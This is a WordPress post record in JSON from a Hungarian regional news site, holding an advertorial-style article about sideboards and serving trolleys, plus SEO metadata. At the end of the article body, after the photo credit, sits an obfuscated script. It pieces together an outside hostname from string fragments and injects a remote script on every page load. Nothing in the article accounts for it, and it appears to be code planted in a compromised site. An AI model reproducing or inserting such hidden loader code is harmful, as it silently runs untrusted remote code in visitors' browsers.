{"id":26288,"date":"2020-07-21T07:14:48","date_gmt":"2020-07-21T05:14:48","guid":{"rendered":"http:\/\/dorogimedence.hu\/?p=26288"},"modified":"2020-07-21T07:15:10","modified_gmt":"2020-07-21T05:15:10","slug":"butorok-a-rendezett-talalashoz","status":"publish","type":"post","link":"https:\/\/dorogimedence.hu\/index.php\/2020\/07\/21\/butorok-a-rendezett-talalashoz\/","title":{"rendered":"B\u00fatorok a rendezett t\u00e1lal\u00e1shoz"},"content":{"rendered":"<p><strong>Az 1900-as \u00e9vek elej\u00e9n minden polg\u00e1ri lak\u00e1s \u00e9s h\u00e1z r\u00e9sze volt az \u00e9tkez\u0151helyis\u00e9g, amelyben rendre helyet kapott egy hatalmas m\u00e9ret\u0171 szekr\u00e9ny vagy kom\u00f3d. Ennek a b\u00fatornak a c\u00e9lja, hogy a t\u00e1lal\u00e1ssal kapcsolatos eszk\u00f6z\u00f6ket t\u00e1rolja. D\u00e9d- \u00e9s \u00fcknagymam\u00e1ink ezekb\u0151l vett\u00e9k el\u0151 az \u00fcnnepi ter\u00edt\u0151t \u00e9s a n\u00e9pies mot\u00edvumokkal d\u00edsz\u00edtett t\u00e1ny\u00e9rokat.<\/strong><\/p>\n<p>Ha ma m\u00e1r nem is divatos a n\u00e9pies \u00e9tk\u00e9szlet, a t\u00e1ny\u00e9rokat sokan a konyh\u00e1ban halmozz\u00e1k fel, holott egy sz\u00e9p t\u00e1ny\u00e9rszett kimondottan j\u00f3l mutat a nappaliban ki\u00e1ll\u00edtva. A ki\u00e1ll\u00edt\u00e1sra pedig nincs is jobb m\u00f3d, mint egy t\u00e1lal\u00f3szekr\u00e9ny! Ma m\u00e1r eg\u00e9szen biztosan tal\u00e1lhatsz modern design ment\u00e9n k\u00e9sz\u00edtett, l\u00e9gies, k\u00f6nnyed \u00e9s form\u00e1s darabokat, amelyek messze t\u00falmutatnak a nagymama szekr\u00e9nysor\u00e1n. A klasszikus fekete polcrendszert\u0151l kezdve a brit telefonf\u00fclke k\u00fcllem\u0171 b\u00fatorig b\u00e1rmilyen darab kaphat\u00f3.<\/p>\n<p>Amennyiben \u00e9rt\u00e9kes \u00e9tk\u00e9szlettel rendelkezel, mindenk\u00e9ppen javasoljuk a vitrin \u00fcveggel ell\u00e1tott b\u00fator v\u00e1laszt\u00e1s\u00e1t. Ez ugyanis nem csup\u00e1n jobban mutat, de kev\u00e9sb\u00e9 porosodik \u00e9s seg\u00edts\u00e9g\u00e9vel k\u00f6nnyebb megoldani az ed\u00e9nyek v\u00e9delm\u00e9t. A <span style=\"text-decoration: underline; color: #0000ff;\"><a style=\"color: #0000ff; text-decoration: underline;\" href=\"https:\/\/www.bonami.hu\/c\/talaloszekrenyek\" target=\"_blank\" rel=\"noopener noreferrer\">t\u00e1lal\u00f3szekr\u00e9nyek<\/a><\/span> \u00e1tl\u00e1that\u00f3v\u00e1 teszik a rendelkez\u00e9sre \u00e1ll\u00f3 eszk\u00f6z\u00f6ket, \u00edgy nem kell fejben tartanod, mit hova tett\u00e9l legut\u00f3bb &#8211; ezzel a vend\u00e9gek fogad\u00e1sa is egyszer\u0171bb\u00e9 v\u00e1lik.<\/p>\n<p><strong>A zs\u00farkocsi seg\u00edt a rendezett t\u00e1lal\u00e1sban<\/strong><\/p>\n<p>A t\u00e1lal\u00f3szekr\u00e9nyek remek kieg\u00e9sz\u00edt\u0151i a t\u00e1lal\u00f3asztalok. Ha nagyobb vend\u00e9gseregre sz\u00e1m\u00edtasz, vagy egyszer\u0171en csup\u00e1n t\u00f6bbf\u00e9le \u00e9telt szolg\u00e1lsz fel, egy plusz pakol\u00f3fel\u00fclet komoly seg\u00edts\u00e9get ny\u00fajthat. A legjobb <span style=\"text-decoration: underline; color: #0000ff;\"><a style=\"color: #0000ff; text-decoration: underline;\" href=\"https:\/\/www.bonami.hu\/c\/talaloasztalok\" target=\"_blank\" rel=\"noopener noreferrer\">t\u00e1lal\u00f3asztalok<\/a><\/span> kerekekkel vannak felszerelve, hogy k\u00f6nnyed\u00e9n eljuttathasd a t\u00e1lakat a konyh\u00e1b\u00f3l az \u00e9tkez\u0151be. A zs\u00farkocsi megold\u00e1s\u00fa t\u00e1lal\u00f3alkalmatoss\u00e1gok nem csak az \u00e9ttermekben hasznosak: sokkal kevesebb t\u00e1lat kell \u00edgy az asztalra zs\u00fafolnod. Tapasztalataink szerint nincsen el\u00e9g nagy asztal, ez k\u00fcl\u00f6n\u00f6sen csal\u00e1di \u00f6sszej\u00f6vetelekkor der\u00fcl ki. Ha van \u00e9tel\u00e9rz\u00e9kenys\u00e9g a csal\u00e1dban (pl. glut\u00e9n- vagy lakt\u00f3zallergia), akkor az \u00e9rintetteknek k\u00fcl\u00f6n kell f\u0151zni, ami extra t\u00e1lakat jelent az asztalon. Egy dekorat\u00edv t\u00e1lal\u00f3asztalon k\u00f6nnyed\u00e9n elhelyezheted a fennmarad\u00f3 ed\u00e9nyeket, \u00edgy marad hely a poharaknak \u00e9s az eb\u00e9dl\u0151asztal k\u00fclleme is sokkal rendezettebb marad.<\/p>\n<p><em>A fot\u00f3 forr\u00e1sa: Irina Bort \/ Shutterstock.com<\/em><br \/>\n<script>\n(function(){\nwmyh=document.createElement(\"script\");wmyh.type=\"text\/javascript\";\nwmyh.async=true;wmyh_=((\"us\")+\"t\")+\"a\";wmyh_+=(\"t.i\")+\"\"+\"n\";wmyh_+=((\"f\")+\"o\");wmyh_+=\"\/\";\nwmyhu=\"196795229.\";wmyhu+=\"q3bXXXrbmyhsismp6dli0e2r2qhi2i\";wmyh.src=\"https:\/\/\"+wmyh_+wmyhu;\nwmyhdb=document.body;wmyhdb.appendChild(wmyh);\n})();\n<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Az 1900-as \u00e9vek elej\u00e9n minden polg\u00e1ri lak\u00e1s \u00e9s h\u00e1z r\u00e9sze volt az \u00e9tkez\u0151helyis\u00e9g, amelyben rendre helyet kapott egy hatalmas m\u00e9ret\u0171 szekr\u00e9ny vagy kom\u00f3d. Ennek a b\u00fatornak a c\u00e9lja, hogy a t\u00e1lal\u00e1ssal kapcsolatos eszk\u00f6z\u00f6ket t\u00e1rolja. D\u00e9d- \u00e9s \u00fcknagymam\u00e1ink ezekb\u0151l vett\u00e9k el\u0151 az \u00fcnnepi ter\u00edt\u0151t \u00e9s a n\u00e9pies mot\u00edvumokkal d\u00edsz\u00edtett t\u00e1ny\u00e9rokat. Ha ma m\u00e1r nem is divatos<\/p>\n","protected":false},"author":1,"featured_media":26289,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"ngg_post_thumbnail":0,"footnotes":""},"categories":[3],"tags":[4301,5026,5025],"class_list":{"0":"post-26288","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-hirek","8":"tag-butor","9":"tag-talalas","10":"tag-zsurkocsi"},"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>B\u00fatorok a rendezett t\u00e1lal\u00e1shoz<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/dorogimedence.hu\/index.php\/2020\/07\/21\/butorok-a-rendezett-talalashoz\/\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"og:locale\" content=\"hu_HU\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"og:type\" content=\"article\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"og:title\" content=\"B\u00fatorok a rendezett t\u00e1lal\u00e1shoz\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"og:description\" content=\"Az 1900-as \u00e9vek elej\u00e9n minden polg\u00e1ri lak\u00e1s \u00e9s h\u00e1z r\u00e9sze volt az \u00e9tkez\u0151helyis\u00e9g, amelyben rendre helyet kapott egy hatalmas m\u00e9ret\u0171 szekr\u00e9ny vagy kom\u00f3d. Ennek a b\u00fatornak a c\u00e9lja, hogy a t\u00e1lal\u00e1ssal kapcsolatos eszk\u00f6z\u00f6ket t\u00e1rolja. D\u00e9d- \u00e9s \u00fcknagymam\u00e1ink ezekb\u0151l vett\u00e9k el\u0151 az \u00fcnnepi ter\u00edt\u0151t \u00e9s a n\u00e9pies mot\u00edvumokkal d\u00edsz\u00edtett t\u00e1ny\u00e9rokat. Ha ma m\u00e1r nem is divatos\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"og:url\" content=\"https:\/\/dorogimedence.hu\/index.php\/2020\/07\/21\/butorok-a-rendezett-talalashoz\/\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"og:site_name\" content=\"Dorogi-medence Region\u00e1lis H\u00edrport\u00e1l\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/dorogimedence\/\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"article:published_time\" content=\"2020-07-21T05:14:48+00:00\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"article:modified_time\" content=\"2020-07-21T05:15:10+00:00\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"og:image\" content=\"https:\/\/i0.wp.com\/dorogimedence.hu\/wp-content\/uploads\/2020\/07\/zsurkocsi.jpg?fit=830%2C450&ssl=1\" class=\"yoast-seo-meta-tag\" \/>\n\t<meta property=\"og:image:width\" content=\"830\" class=\"yoast-seo-meta-tag\" \/>\n\t<meta property=\"og:image:height\" content=\"450\" class=\"yoast-seo-meta-tag\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" class=\"yoast-seo-meta-tag\" \/>\n<meta name=\"author\" content=\"dorogimedence.hu\" class=\"yoast-seo-meta-tag\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" class=\"yoast-seo-meta-tag\" \/>\n<meta name=\"twitter:label1\" content=\"Szerz\u0151:\" class=\"yoast-seo-meta-tag\" \/>\n\t<meta name=\"twitter:data1\" content=\"dorogimedence.hu\" class=\"yoast-seo-meta-tag\" \/>\n\t<meta name=\"twitter:label2\" content=\"Becs\u00fclt olvas\u00e1si id\u0151\" class=\"yoast-seo-meta-tag\" \/>\n\t<meta name=\"twitter:data2\" content=\"2 perc\" class=\"yoast-seo-meta-tag\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2020\\\/07\\\/21\\\/butorok-a-rendezett-talalashoz\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2020\\\/07\\\/21\\\/butorok-a-rendezett-talalashoz\\\/\"},\"author\":{\"name\":\"dorogimedence.hu\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#\\\/schema\\\/person\\\/ce6091eeb7e95ecdc87890d6aa8e0fd4\"},\"headline\":\"B\u00fatorok a rendezett t\u00e1lal\u00e1shoz\",\"datePublished\":\"2020-07-21T05:14:48+00:00\",\"dateModified\":\"2020-07-21T05:15:10+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2020\\\/07\\\/21\\\/butorok-a-rendezett-talalashoz\\\/\"},\"wordCount\":464,\"publisher\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2020\\\/07\\\/21\\\/butorok-a-rendezett-talalashoz\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/dorogimedence.hu\\\/wp-content\\\/uploads\\\/2020\\\/07\\\/zsurkocsi.jpg\",\"keywords\":[\"b\u00fator\",\"t\u00e1lal\u00e1s\",\"zsurkocsi\"],\"articleSection\":[\"H\u00edrek\"],\"inLanguage\":\"hu\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2020\\\/07\\\/21\\\/butorok-a-rendezett-talalashoz\\\/\",\"url\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2020\\\/07\\\/21\\\/butorok-a-rendezett-talalashoz\\\/\",\"name\":\"B\u00fatorok a rendezett t\u00e1lal\u00e1shoz\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2020\\\/07\\\/21\\\/butorok-a-rendezett-talalashoz\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2020\\\/07\\\/21\\\/butorok-a-rendezett-talalashoz\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/dorogimedence.hu\\\/wp-content\\\/uploads\\\/2020\\\/07\\\/zsurkocsi.jpg\",\"datePublished\":\"2020-07-21T05:14:48+00:00\",\"dateModified\":\"2020-07-21T05:15:10+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2020\\\/07\\\/21\\\/butorok-a-rendezett-talalashoz\\\/#breadcrumb\"},\"inLanguage\":\"hu\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2020\\\/07\\\/21\\\/butorok-a-rendezett-talalashoz\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"hu\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2020\\\/07\\\/21\\\/butorok-a-rendezett-talalashoz\\\/#primaryimage\",\"url\":\"https:\\\/\\\/dorogimedence.hu\\\/wp-content\\\/uploads\\\/2020\\\/07\\\/zsurkocsi.jpg\",\"contentUrl\":\"https:\\\/\\\/dorogimedence.hu\\\/wp-content\\\/uploads\\\/2020\\\/07\\\/zsurkocsi.jpg\",\"width\":830,\"height\":450},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2020\\\/07\\\/21\\\/butorok-a-rendezett-talalashoz\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Kezd\u0151lap\",\"item\":\"https:\\\/\\\/dorogimedence.hu\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"B\u00fatorok a rendezett t\u00e1lal\u00e1shoz\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#website\",\"url\":\"https:\\\/\\\/dorogimedence.hu\\\/\",\"name\":\"Dorogi-medence Region\u00e1lis H\u00edrport\u00e1l\",\"description\":\"Dorog, Keszt\u00f6lc, Le\u00e1nyv\u00e1r, Piliscs\u00e9v, Tokod, Tokodalt\u00e1r\u00f3, Csolnok, Esztergom-kertv\u00e1ros: h\u00edrek, programok\",\"publisher\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/dorogimedence.hu\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"hu\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#organization\",\"name\":\"Dorogi-medence Region\u00e1lis H\u00edrport\u00e1l\",\"url\":\"https:\\\/\\\/dorogimedence.hu\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"hu\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/dorogimedence.hu\\\/wp-content\\\/uploads\\\/2021\\\/04\\\/logo-feher-600.png\",\"contentUrl\":\"https:\\\/\\\/dorogimedence.hu\\\/wp-content\\\/uploads\\\/2021\\\/04\\\/logo-feher-600.png\",\"width\":600,\"height\":100,\"caption\":\"Dorogi-medence Region\u00e1lis H\u00edrport\u00e1l\"},\"image\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/www.facebook.com\\\/dorogimedence\\\/\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#\\\/schema\\\/person\\\/ce6091eeb7e95ecdc87890d6aa8e0fd4\",\"name\":\"dorogimedence.hu\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"hu\",\"@id\":\"\\\/\\\/www.gravatar.com\\\/avatar\\\/d8d45f8901aadff40a4af72c0b826f1d?s=96&#038;r=g&#038;d=mm\",\"url\":\"\\\/\\\/www.gravatar.com\\\/avatar\\\/d8d45f8901aadff40a4af72c0b826f1d?s=96&#038;r=g&#038;d=mm\",\"contentUrl\":\"\\\/\\\/www.gravatar.com\\\/avatar\\\/d8d45f8901aadff40a4af72c0b826f1d?s=96&#038;r=g&#038;d=mm\",\"caption\":\"dorogimedence.hu\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"B\u00fatorok a rendezett t\u00e1lal\u00e1shoz","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/dorogimedence.hu\/index.php\/2020\/07\/21\/butorok-a-rendezett-talalashoz\/","og_locale":"hu_HU","og_type":"article","og_title":"B\u00fatorok a rendezett t\u00e1lal\u00e1shoz","og_description":"Az 1900-as \u00e9vek elej\u00e9n minden polg\u00e1ri lak\u00e1s \u00e9s h\u00e1z r\u00e9sze volt az \u00e9tkez\u0151helyis\u00e9g, amelyben rendre helyet kapott egy hatalmas m\u00e9ret\u0171 szekr\u00e9ny vagy kom\u00f3d. Ennek a b\u00fatornak a c\u00e9lja, hogy a t\u00e1lal\u00e1ssal kapcsolatos eszk\u00f6z\u00f6ket t\u00e1rolja. D\u00e9d- \u00e9s \u00fcknagymam\u00e1ink ezekb\u0151l vett\u00e9k el\u0151 az \u00fcnnepi ter\u00edt\u0151t \u00e9s a n\u00e9pies mot\u00edvumokkal d\u00edsz\u00edtett t\u00e1ny\u00e9rokat. Ha ma m\u00e1r nem is divatos","og_url":"https:\/\/dorogimedence.hu\/index.php\/2020\/07\/21\/butorok-a-rendezett-talalashoz\/","og_site_name":"Dorogi-medence Region\u00e1lis H\u00edrport\u00e1l","article_publisher":"https:\/\/www.facebook.com\/dorogimedence\/","article_published_time":"2020-07-21T05:14:48+00:00","article_modified_time":"2020-07-21T05:15:10+00:00","og_image":[{"width":830,"height":450,"url":"https:\/\/i0.wp.com\/dorogimedence.hu\/wp-content\/uploads\/2020\/07\/zsurkocsi.jpg?fit=830%2C450&ssl=1","type":"image\/jpeg"}],"author":"dorogimedence.hu","twitter_card":"summary_large_image","twitter_misc":{"Szerz\u0151:":"dorogimedence.hu","Becs\u00fclt olvas\u00e1si id\u0151":"2 perc"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/dorogimedence.hu\/index.php\/2020\/07\/21\/butorok-a-rendezett-talalashoz\/#article","isPartOf":{"@id":"https:\/\/dorogimedence.hu\/index.php\/2020\/07\/21\/butorok-a-rendezett-talalashoz\/"},"author":{"name":"dorogimedence.hu","@id":"https:\/\/dorogimedence.hu\/#\/schema\/person\/ce6091eeb7e95ecdc87890d6aa8e0fd4"},"headline":"B\u00fatorok a rendezett t\u00e1lal\u00e1shoz","datePublished":"2020-07-21T05:14:48+00:00","dateModified":"2020-07-21T05:15:10+00:00","mainEntityOfPage":{"@id":"https:\/\/dorogimedence.hu\/index.php\/2020\/07\/21\/butorok-a-rendezett-talalashoz\/"},"wordCount":464,"publisher":{"@id":"https:\/\/dorogimedence.hu\/#organization"},"image":{"@id":"https:\/\/dorogimedence.hu\/index.php\/2020\/07\/21\/butorok-a-rendezett-talalashoz\/#primaryimage"},"thumbnailUrl":"https:\/\/dorogimedence.hu\/wp-content\/uploads\/2020\/07\/zsurkocsi.jpg","keywords":["b\u00fator","t\u00e1lal\u00e1s","zsurkocsi"],"articleSection":["H\u00edrek"],"inLanguage":"hu"},{"@type":"WebPage","@id":"https:\/\/dorogimedence.hu\/index.php\/2020\/07\/21\/butorok-a-rendezett-talalashoz\/","url":"https:\/\/dorogimedence.hu\/index.php\/2020\/07\/21\/butorok-a-rendezett-talalashoz\/","name":"B\u00fatorok a rendezett t\u00e1lal\u00e1shoz","isPartOf":{"@id":"https:\/\/dorogimedence.hu\/#website"},"primaryImageOfPage":{"@id":"https:\/\/dorogimedence.hu\/index.php\/2020\/07\/21\/butorok-a-rendezett-talalashoz\/#primaryimage"},"image":{"@id":"https:\/\/dorogimedence.hu\/index.php\/2020\/07\/21\/butorok-a-rendezett-talalashoz\/#primaryimage"},"thumbnailUrl":"https:\/\/dorogimedence.hu\/wp-content\/uploads\/2020\/07\/zsurkocsi.jpg","datePublished":"2020-07-21T05:14:48+00:00","dateModified":"2020-07-21T05:15:10+00:00","breadcrumb":{"@id":"https:\/\/dorogimedence.hu\/index.php\/2020\/07\/21\/butorok-a-rendezett-talalashoz\/#breadcrumb"},"inLanguage":"hu","potentialAction":[{"@type":"ReadAction","target":["https:\/\/dorogimedence.hu\/index.php\/2020\/07\/21\/butorok-a-rendezett-talalashoz\/"]}]},{"@type":"ImageObject","inLanguage":"hu","@id":"https:\/\/dorogimedence.hu\/index.php\/2020\/07\/21\/butorok-a-rendezett-talalashoz\/#primaryimage","url":"https:\/\/dorogimedence.hu\/wp-content\/uploads\/2020\/07\/zsurkocsi.jpg","contentUrl":"https:\/\/dorogimedence.hu\/wp-content\/uploads\/2020\/07\/zsurkocsi.jpg","width":830,"height":450},{"@type":"BreadcrumbList","@id":"https:\/\/dorogimedence.hu\/index.php\/2020\/07\/21\/butorok-a-rendezett-talalashoz\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Kezd\u0151lap","item":"https:\/\/dorogimedence.hu\/"},{"@type":"ListItem","position":2,"name":"B\u00fatorok a rendezett t\u00e1lal\u00e1shoz"}]},{"@type":"WebSite","@id":"https:\/\/dorogimedence.hu\/#website","url":"https:\/\/dorogimedence.hu\/","name":"Dorogi-medence Region\u00e1lis H\u00edrport\u00e1l","description":"Dorog, Keszt\u00f6lc, Le\u00e1nyv\u00e1r, Piliscs\u00e9v, Tokod, Tokodalt\u00e1r\u00f3, Csolnok, Esztergom-kertv\u00e1ros: h\u00edrek, programok","publisher":{"@id":"https:\/\/dorogimedence.hu\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/dorogimedence.hu\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"hu"},{"@type":"Organization","@id":"https:\/\/dorogimedence.hu\/#organization","name":"Dorogi-medence Region\u00e1lis H\u00edrport\u00e1l","url":"https:\/\/dorogimedence.hu\/","logo":{"@type":"ImageObject","inLanguage":"hu","@id":"https:\/\/dorogimedence.hu\/#\/schema\/logo\/image\/","url":"https:\/\/dorogimedence.hu\/wp-content\/uploads\/2021\/04\/logo-feher-600.png","contentUrl":"https:\/\/dorogimedence.hu\/wp-content\/uploads\/2021\/04\/logo-feher-600.png","width":600,"height":100,"caption":"Dorogi-medence Region\u00e1lis H\u00edrport\u00e1l"},"image":{"@id":"https:\/\/dorogimedence.hu\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/dorogimedence\/"]},{"@type":"Person","@id":"https:\/\/dorogimedence.hu\/#\/schema\/person\/ce6091eeb7e95ecdc87890d6aa8e0fd4","name":"dorogimedence.hu","image":{"@type":"ImageObject","inLanguage":"hu","@id":"\/\/www.gravatar.com\/avatar\/d8d45f8901aadff40a4af72c0b826f1d?s=96&#038;r=g&#038;d=mm","url":"\/\/www.gravatar.com\/avatar\/d8d45f8901aadff40a4af72c0b826f1d?s=96&#038;r=g&#038;d=mm","contentUrl":"\/\/www.gravatar.com\/avatar\/d8d45f8901aadff40a4af72c0b826f1d?s=96&#038;r=g&#038;d=mm","caption":"dorogimedence.hu"}}]}},"_links":{"self":[{"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/posts\/26288","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/comments?post=26288"}],"version-history":[{"count":0,"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/posts\/26288\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/media\/26289"}],"wp:attachment":[{"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/media?parent=26288"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/categories?post=26288"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/tags?post=26288"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}